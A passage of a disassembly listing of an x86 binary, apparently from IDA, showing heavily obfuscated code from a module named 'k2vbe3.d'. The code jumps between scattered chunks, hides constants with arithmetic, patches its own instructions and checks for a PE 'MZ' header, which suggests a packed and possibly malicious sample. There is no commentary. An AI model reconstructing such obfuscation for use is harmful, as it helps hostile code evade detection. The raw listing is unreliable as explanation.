loc_441FE1:				; CODE XREF: sub_43FE0A+12520j
		jmp	loc_450264
; END OF FUNCTION CHUNK	FOR sub_43FE0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D3A3

loc_441FE6:				; CODE XREF: sub_44D3A3+3j
		jmp	loc_43D095
; END OF FUNCTION CHUNK	FOR sub_44D3A3

; =============== S U B	R O U T	I N E =======================================



sub_441FEB	proc near		; CODE XREF: sub_441FCCp
					; k2vbe3.d:0045404Aj ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00453FC6 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00454CC8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455E64 SIZE 0000000A BYTES

		js	loc_455E64
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	eax
		jmp	loc_454CC8
sub_441FEB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_441FFB:				; CODE XREF: sub_43E135+14C8Dj
		sub	al, 99h
		push	29C94C0Eh
		pop	edx
		sub	edx, 70D12779h
		and	edx, ds:4000EEh
		jmp	loc_450377
; END OF FUNCTION CHUNK	FOR sub_43E135
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_442014:				; CODE XREF: sub_457DCA-1A4B3j
		jz	loc_44E303
		jmp	loc_44CF0A
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E90

loc_44201F:				; CODE XREF: sub_447E90+3j
		push	ecx
		mov	esp, ebp

loc_442022:				; CODE XREF: k2vbe3.d:00457D61j
		call	sub_44BB73

loc_442027:				; CODE XREF: k2vbe3.d:004575B8j
		jmp	sub_43C82E
; END OF FUNCTION CHUNK	FOR sub_447E90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446478

loc_44202C:				; CODE XREF: sub_446478:loc_440578j
		jge	loc_4503CB
		test	ecx, ebx
		jmp	loc_442EAE
; END OF FUNCTION CHUNK	FOR sub_446478
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_442039:				; CODE XREF: sub_43C3A9+DBD8j
		pop	ecx
		jnz	loc_44A4AE
		jp	loc_45A14E
		xor	esi, 39AD699h
		xchg	edx, ecx
		jmp	loc_455118
; END OF FUNCTION CHUNK	FOR sub_43C3A9

; =============== S U B	R O U T	I N E =======================================



sub_442053	proc near		; DATA XREF: k2vbe3.d:0045748Co

; FUNCTION CHUNK AT 0043CC6A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C148 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045206A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004583FF SIZE 00000017 BYTES

		cmp	word ptr [eax],	5A4Dh
		jnz	loc_453900
		jmp	loc_45206A
sub_442053	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_442063:				; CODE XREF: k2vbe3.d:0045B144j
		mov	edx, esi
		mov	esi, eax
		jmp	loc_44D58F
; ---------------------------------------------------------------------------

loc_44206C:				; DATA XREF: sub_449FE9-9A3Eo
		push	0D699999h
		xchg	eax, [esp]
		mov	ecx, eax
		pop	eax
		rol	ecx, 14h
		add	ecx, 66B349EFh
		xchg	ecx, [esp]
		jmp	sub_4553CC
; ---------------------------------------------------------------------------
		push	edx
		jmp	loc_45336A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_44208E:				; CODE XREF: sub_450F71:loc_454958j
		xor	eax, 4676F915h
		add	eax, 0BAF6613Dh
		cmp	eax, 0B5E8C276h
		jmp	loc_444504
; END OF FUNCTION CHUNK	FOR sub_450F71
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_350. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EBB

loc_4420A6:				; CODE XREF: sub_454EBB:loc_454E3Dj
		call	sub_454407

loc_4420AB:				; CODE XREF: sub_459F85+1F71j
		jmp	loc_455E78
; END OF FUNCTION CHUNK	FOR sub_454EBB
; ---------------------------------------------------------------------------

loc_4420B0:				; CODE XREF: k2vbe3.d:0044442Bj
		jmp	loc_43D17D

; =============== S U B	R O U T	I N E =======================================



sub_4420B5	proc near		; CODE XREF: sub_44C1BD:loc_43DBA0p
					; k2vbe3.d:0044A8DCj

; FUNCTION CHUNK AT 004462F5 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	edx, 690B3721h
		push	offset loc_44D2B1
		jmp	loc_4462F5
sub_4420B5	endp

; ---------------------------------------------------------------------------

loc_4420C9:				; CODE XREF: k2vbe3.d:004507ADj
		push	535F4DE7h
		pop	eax
		sub	eax, 89189294h
		xor	eax, 2EC71722h
		rol	eax, 4
		add	eax, 23BDB0F0h
		jmp	loc_456F26
; ---------------------------------------------------------------------------

loc_4420E9:				; CODE XREF: k2vbe3.d:0044CCFDj
		jnb	loc_44AFF3

loc_4420EF:				; CODE XREF: k2vbe3.d:loc_4444BEj
		mov	eax, 0E1h
		push	ecx
		push	1BD57A2Ch
		jmp	loc_44A16F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_439. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E8E0

loc_442100:				; CODE XREF: sub_44E8E0+1Ej
		jmp	sub_4583B8
; END OF FUNCTION CHUNK	FOR sub_44E8E0
; ---------------------------------------------------------------------------

loc_442105:				; CODE XREF: k2vbe3.d:loc_44D1B3j
		pop	ecx
		mov	eax, ds:dword_453CF4
		or	eax, eax
		jnz	loc_44F4E9
		jmp	loc_43CB20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_442119:				; CODE XREF: sub_43C3A9+D5BFj
		pop	edi

locret_44211A:				; CODE XREF: k2vbe3.d:0044452Ej
		retn
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454AD4

loc_44211B:				; CODE XREF: sub_454AD4+14j
		jmp	loc_44D6CC
; END OF FUNCTION CHUNK	FOR sub_454AD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B870

loc_442120:				; CODE XREF: sub_44B870+5C20j
		jmp	loc_44025A
; END OF FUNCTION CHUNK	FOR sub_44B870
; ---------------------------------------------------------------------------

loc_442125:				; CODE XREF: k2vbe3.d:00453917j
					; k2vbe3.d:loc_454770j
		rol	eax, 19h
		push	eax
		call	sub_453347
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44316D

loc_44212F:				; CODE XREF: sub_44316D+939Ej
		jmp	loc_45794F
; END OF FUNCTION CHUNK	FOR sub_44316D
; ---------------------------------------------------------------------------

loc_442134:				; CODE XREF: k2vbe3.d:004599F9j
		push	ebx
		push	0CE5D3905h
		jmp	loc_44FE52
; ---------------------------------------------------------------------------

loc_44213F:				; DATA XREF: sub_454F1F+8o
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43DAB0
		jmp	loc_45A3AE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_386. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_44214E:				; CODE XREF: sub_449372+FCBEj
		jmp	loc_448BE7
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448472

loc_442153:				; CODE XREF: sub_448472+1A49j
		jmp	loc_45242A
; END OF FUNCTION CHUNK	FOR sub_448472
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_442158:				; CODE XREF: sub_44D298:loc_448E7Bj
		jmp	loc_44E92D
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75C

loc_44215D:				; CODE XREF: sub_43F75C:loc_43F773j
		jmp	loc_448971
; END OF FUNCTION CHUNK	FOR sub_43F75C
; ---------------------------------------------------------------------------

loc_442162:				; CODE XREF: k2vbe3.d:00449C2Bj
		shr	ecx, 10h
		or	ebx, 0EA5AFE42h
		sub	ebx, eax
		popf
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_44216E:				; CODE XREF: sub_444B3E:loc_449C1Aj
		or	edx, 99A9F02Dh
		add	edx, 558AA97Eh
		add	eax, edx
		pop	edx
		jmp	loc_450AB6
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------
		dw 27B9h
; ---------------------------------------------------------------------------
		stosd			; DATA XREF: sub_442F31+3ECDo
					; k2vbe3.d:0044D982o
		sub	[ebx+2AA27292h], edx
		mov	eax, 1BB146h

loc_442190:				; CODE XREF: k2vbe3.d:00447AEFj
		jmp	locret_441345
; ---------------------------------------------------------------------------
		js	loc_45629D
		push	0F13644C3h
		pop	edx
		xor	edx, 4B6B9B1h
		or	edx, 0D31FB49Eh
		jmp	loc_455ABF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_4421B2:				; CODE XREF: sub_4553CC:loc_454A29j
		jz	loc_4428CC
		jmp	loc_44F021
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ECF3

loc_4421BD:				; CODE XREF: sub_44ECF3:loc_44ED03j
		add	ebx, 1BD43161h
		xor	ebx, 0E0B8593Ah
		rol	ebx, 10h
		add	ebx, 0D4B4E5FFh
		xchg	ebx, [esp+0]
		jmp	sub_448D3A
; END OF FUNCTION CHUNK	FOR sub_44ECF3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EE3

loc_4421DA:				; CODE XREF: sub_440EE3+Fj
		cmp	ebx, 2D902A35h
		jmp	loc_458009
; END OF FUNCTION CHUNK	FOR sub_440EE3
; ---------------------------------------------------------------------------

loc_4421E5:				; DATA XREF: sub_44F70D-11A98o
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44A74E
		jmp	loc_454D5D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_4421F4:				; CODE XREF: sub_44D59D:loc_44768Dj
		adc	ecx, ebx
		jg	loc_44E2B2

loc_4421FC:				; CODE XREF: sub_441DCC:loc_4491B8j
		jmp	loc_45996F
; END OF FUNCTION CHUNK	FOR sub_44D59D
; ---------------------------------------------------------------------------

loc_442201:				; CODE XREF: k2vbe3.d:loc_45ACF4j
		push	eax
		push	0
		push	offset loc_44AFC0
		jmp	locret_446530
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A7C2

loc_44220E:				; CODE XREF: sub_44A7C2+6543j
		xor	eax, 8FAF052Eh
		or	eax, 97639469h
		xor	eax, 11E096CDh
		call	sub_447E07

loc_442225:				; CODE XREF: sub_4461D5+12256j
		jmp	loc_44E7C7
; END OF FUNCTION CHUNK	FOR sub_44A7C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EABB

loc_44222A:				; CODE XREF: sub_44EABB+94F0j
		jmp	loc_43E08D
; END OF FUNCTION CHUNK	FOR sub_44EABB
; ---------------------------------------------------------------------------

loc_44222F:				; CODE XREF: k2vbe3.d:loc_4593A8j
		push	10h
		call	sub_43FA2C
		mov	[ebp-10h], eax
		cmp	dword ptr [ebp-10h], 0
		jmp	loc_45AA39
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F1C

loc_442242:				; CODE XREF: sub_458F1C:loc_459E4Aj
		push	esi
		push	0FB65CE97h
		pop	esi
		add	esi, 96F486E6h
		or	esi, 1BEE5E30h

loc_442255:				; CODE XREF: sub_446E24+14B64j
		and	esi, 0DECF21ABh
		jmp	loc_4472AE
; END OF FUNCTION CHUNK	FOR sub_458F1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444E90

loc_442260:				; CODE XREF: sub_444E90+9j
		pop	ecx
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_444615
		mov	eax, 0CAAB96A5h
		push	esi
		push	48F96C24h
		pop	esi
		jmp	loc_43E982
; END OF FUNCTION CHUNK	FOR sub_444E90
; ---------------------------------------------------------------------------

loc_44227B:				; CODE XREF: k2vbe3.d:004567D2j
		jnb	loc_447CD2
		mov	eax, [esp]
		push	edx
		push	ecx
		push	0A3C697AEh
		pop	ecx
		jmp	loc_44AB21
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_442291:				; CODE XREF: sub_4570C0:loc_44E473j
		push	offset sub_4523BE
		jmp	loc_443911
; END OF FUNCTION CHUNK	FOR sub_4570C0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_88. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443DD

loc_44229C:				; CODE XREF: sub_4443DD+83EAj
		jmp	loc_449B3E
; END OF FUNCTION CHUNK	FOR sub_4443DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44811E

loc_4422A1:				; CODE XREF: sub_44811E:loc_43C602j
		or	ecx, 65B37094h
		rol	ecx, 4
		add	ecx, 4C1E811h
		mov	[ecx], eax
		pop	ecx
		lea	eax, nullsub_476
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_476
; END OF FUNCTION CHUNK	FOR sub_44811E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_354. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45762D

loc_4422C2:				; CODE XREF: sub_45762D:loc_4551DEj
		push	eax
		mov	eax, edx
		push	ecx
		push	offset loc_446300
		jmp	loc_450D63
; END OF FUNCTION CHUNK	FOR sub_45762D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E753

loc_4422D0:				; CODE XREF: sub_43E753:loc_442A92j
		add	eax, 17489E1Dh
		push	ecx
		pushf
		push	0D4C2D765h
		jmp	loc_455FF5
; END OF FUNCTION CHUNK	FOR sub_43E753
; ---------------------------------------------------------------------------

loc_4422E2:				; CODE XREF: k2vbe3.d:00458A35j
		pop	eax
		xor	eax, 1C80D06Dh
		sub	eax, 0E1E6AE2Dh
		add	eax, 0A841FDFFh
		rol	eax, 0Dh
		jmp	loc_44470B
; ---------------------------------------------------------------------------
		test	edx, eax
		jmp	loc_44737D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_401. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449FE9

loc_442305:				; CODE XREF: sub_449FE9-9A39j
		jmp	nullsub_185
; END OF FUNCTION CHUNK	FOR sub_449FE9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4590BA

loc_44230A:				; CODE XREF: sub_4590BA:loc_44A33Aj
					; sub_4590BA+11DEj
		push	edx
		push	86EE7FCEh
		pop	edx
		or	edx, 2EDABAABh
		add	edx, 51465CD2h
		jmp	loc_449CE8
; END OF FUNCTION CHUNK	FOR sub_4590BA
; ---------------------------------------------------------------------------

loc_442322:				; CODE XREF: k2vbe3.d:0044064Bj
		pop	esi
		and	esi, 0B389D80Eh
		cmp	esi, 886E23FDh
		jmp	loc_4490E1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_142. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_442335:				; CODE XREF: sub_445124+F42Dj
		jmp	loc_44F50B
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44233A:				; CODE XREF: sub_45A323-12DFEj
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_44233F:				; CODE XREF: sub_445124+A3FCj
		add	esi, 92807CA5h
		xor	esi, 66773A8Bh

loc_44234B:				; CODE XREF: k2vbe3.d:00443987j
		rol	esi, 1
		xor	esi, 0A0894CAFh
		test	esi, 100h
		jmp	loc_44126B
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_44235E:				; CODE XREF: sub_43CCD0:loc_447B05j
		xor	eax, 6FD3CFEEh
		rol	eax, 5
		or	eax, 37994D0h
		add	eax, 52F861A2h
		jmp	loc_4525CE
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_442378:				; CODE XREF: sub_457D4B-14F14j
		add	edx, edi
		mov	edi, [ebx]

loc_44237C:				; CODE XREF: sub_457D4B:loc_442E2Bj
		xor	eax, 659FD85Dh
		rol	eax, 0Ah
		jnb	loc_454473

loc_44238B:				; CODE XREF: k2vbe3.d:0044CB18j
		jmp	nullsub_394
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_442390:				; CODE XREF: sub_44E0F6-FCCBj
		adc	eax, 76B5896Dh
		js	loc_459580
		jmp	loc_454469
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------

loc_4423A1:				; CODE XREF: k2vbe3.d:004487BDj
		jnb	nullsub_193

; =============== S U B	R O U T	I N E =======================================



sub_4423A7	proc near		; CODE XREF: k2vbe3.d:loc_44FA18p
		xchg	eax, [esp+0]
		pop	eax
		mov	[ecx], eax
		pop	ecx
		call	sub_45544E
sub_4423A7	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44D9A7

loc_4423B3:				; CODE XREF: sub_44D9A7+1675j
		jmp	loc_44B60C
; END OF FUNCTION CHUNK	FOR sub_44D9A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4412A1

loc_4423B8:				; CODE XREF: sub_4412A1+Fj
		jmp	loc_452D4D
; END OF FUNCTION CHUNK	FOR sub_4412A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F22

loc_4423BD:				; CODE XREF: sub_445F22:loc_4591B2j
		sub	edi, ecx
		sub	edi, esi
		adc	edx, 0A3611362h
		and	esi, 18E0D8AAh
		jmp	loc_43EE50
; END OF FUNCTION CHUNK	FOR sub_445F22

; =============== S U B	R O U T	I N E =======================================



sub_4423D2	proc near		; CODE XREF: k2vbe3.d:00447772j
					; sub_45BDE4-12AA2p

; FUNCTION CHUNK AT 0043C89E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E5EC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043EBEC SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044002D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443F29 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00447B9D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D128 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00452563 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452B2B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004542F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454B41 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045772D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045ABBE SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045AE9C SIZE 00000028 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, ds:dword_444F3C
		or	eax, eax
		jnz	loc_45AE9C

loc_4423E4:				; CODE XREF: k2vbe3.d:loc_459518j
		jmp	loc_45772D
sub_4423D2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		popf
		test	edi, 2DF6079Dh
		jmp	loc_4444E6
; ---------------------------------------------------------------------------

loc_4423F5:				; DATA XREF: k2vbe3.d:00457F83o
		lea	eax, loc_4552E2
		push	offset sub_449D74

loc_442400:				; CODE XREF: k2vbe3.d:loc_4510ECj
		jmp	locret_44725B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444297

loc_442405:				; CODE XREF: sub_444297-4D5Bj
					; k2vbe3.d:004400A4j ...
		jnb	loc_440F60
		lea	eax, [ebp-20h]
		mov	dword ptr [eax], 70736957h
		push	90EC9ECDh
		jmp	loc_4592EE
; END OF FUNCTION CHUNK	FOR sub_444297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_44241E:				; CODE XREF: sub_44D0D5-B1Fj
					; sub_458DAF+Cj ...
		mov	esp, ebp
		xchg	edx, [esp+0]
		mov	ebp, edx
		pop	edx
		jmp	loc_454A33
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_44242B:				; CODE XREF: sub_441D41+6EB9j
					; sub_441D41+6ECEj
		or	esi, 9A16B66Bh
		add	esi, 65E84986h
		xchg	esi, [esp+0]
		push	offset loc_440E05
		jmp	loc_4413C5
; END OF FUNCTION CHUNK	FOR sub_441D41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459D58

loc_442444:				; CODE XREF: sub_459D58:loc_44C3F8j
		push	offset loc_446B08
		jmp	nullsub_512
; END OF FUNCTION CHUNK	FOR sub_459D58
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_44244E:				; CODE XREF: sub_444B3E:loc_44B395j
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_441748
		or	eax, eax
		jmp	loc_43F49F
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_44245E:				; CODE XREF: sub_43F7AC+1CAC9j
		mov	esi, 4C56453Ch
		jp	loc_456896
		jmp	loc_45590F
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_44246E:				; CODE XREF: sub_450F71:loc_450FE2j
		add	eax, esi
		jmp	loc_4532C8
; END OF FUNCTION CHUNK	FOR sub_450F71

; =============== S U B	R O U T	I N E =======================================



sub_442475	proc near		; DATA XREF: k2vbe3.d:00446EAFo

; FUNCTION CHUNK AT 0044463F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445481 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447F49 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448403 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004489EF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B4DF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C823 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044C9A4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044E773 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F895 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004506A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451A2E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458DC6 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045A201 SIZE 0000001C BYTES

		call	sub_45B74D
		call	sub_4508A3
		jmp	loc_44B4DF
sub_442475	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_442484:				; CODE XREF: sub_43C82Ej
		mov	edx, ds:dword_451730
		or	edx, edx
		jmp	loc_43E217
; END OF FUNCTION CHUNK	FOR sub_43C82E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_442491:				; CODE XREF: sub_44F028+2j
					; sub_454E69:loc_45003Cj ...
		add	dword ptr [ebp-4], 8

loc_442495:				; CODE XREF: k2vbe3.d:00452749j
		jmp	loc_44FA8C
; END OF FUNCTION CHUNK	FOR sub_44F028

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44249A	proc near		; CODE XREF: sub_44CAB1+Ap
					; sub_45051F:loc_457C85j

var_138		= dword	ptr -138h
var_6		= word ptr -6

; FUNCTION CHUNK AT 0043C52E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E186 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00444FE9 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004466E4 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044FA22 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004567F5 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp

loc_44249D:				; CODE XREF: k2vbe3.d:loc_4439EBj
		jnb	sub_45244A
		add	esp, 0FFFFFED0h
		push	esi
		push	213C2178h
		pop	esi
		jmp	loc_43C52E
sub_44249A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_4424B5:				; CODE XREF: sub_4570C0-2DB8j
		pop	edi
		mov	eax, ds:dword_43FA90
		or	eax, eax
		jnz	loc_43EF9D
		jmp	loc_44BA70
; END OF FUNCTION CHUNK	FOR sub_4570C0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_500. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4424CA:				; CODE XREF: k2vbe3.d:0044FC36j
		jmp	loc_44FE41

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4424CF	proc near		; CODE XREF: sub_43CC89j

var_24		= dword	ptr -24h
var_1C		= dword	ptr -1Ch
var_1		= byte ptr -1
arg_4		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043E665 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043F1EF SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043F4C1 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004400B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004406BA SIZE 00000031 BYTES
; FUNCTION CHUNK AT 004419A3 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00442518 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00446D58 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00446E82 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00447476 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004479AC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004496C3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044B1AF SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044C9D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CA05 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044CAA6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CE49 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044CFC7 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D51B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044DBF7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DD49 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E8B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ECC9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F10E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044F851 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044FC56 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004500E6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004518C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045198A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00452377 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004529F7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452BA3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453166 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045423D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045617A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458231 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004586E8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00458858 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459B8A SIZE 00000012 BYTES

		push	ebp
		mov	ebp, esp
		push	ebx
		jmp	loc_43F1EF
sub_4424CF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4524D2

loc_4424D8:				; CODE XREF: sub_4524D2:loc_443432j
		push	offset sub_4402EF
		jmp	nullsub_502
; END OF FUNCTION CHUNK	FOR sub_4524D2
; ---------------------------------------------------------------------------
		sbb	ebx, edi
		jmp	sub_4507E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DAF6

loc_4424E9:				; CODE XREF: sub_44DAF6:loc_44CB42j
		jge	loc_449C9E

loc_4424EF:				; CODE XREF: k2vbe3.d:004403B2j
		jmp	loc_451F5C
; END OF FUNCTION CHUNK	FOR sub_44DAF6
; ---------------------------------------------------------------------------
		mov	eax, ebx
		jmp	loc_449C9A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_4424FB:				; CODE XREF: sub_4570C0-DF70j
		jl	loc_44E473
		push	edx
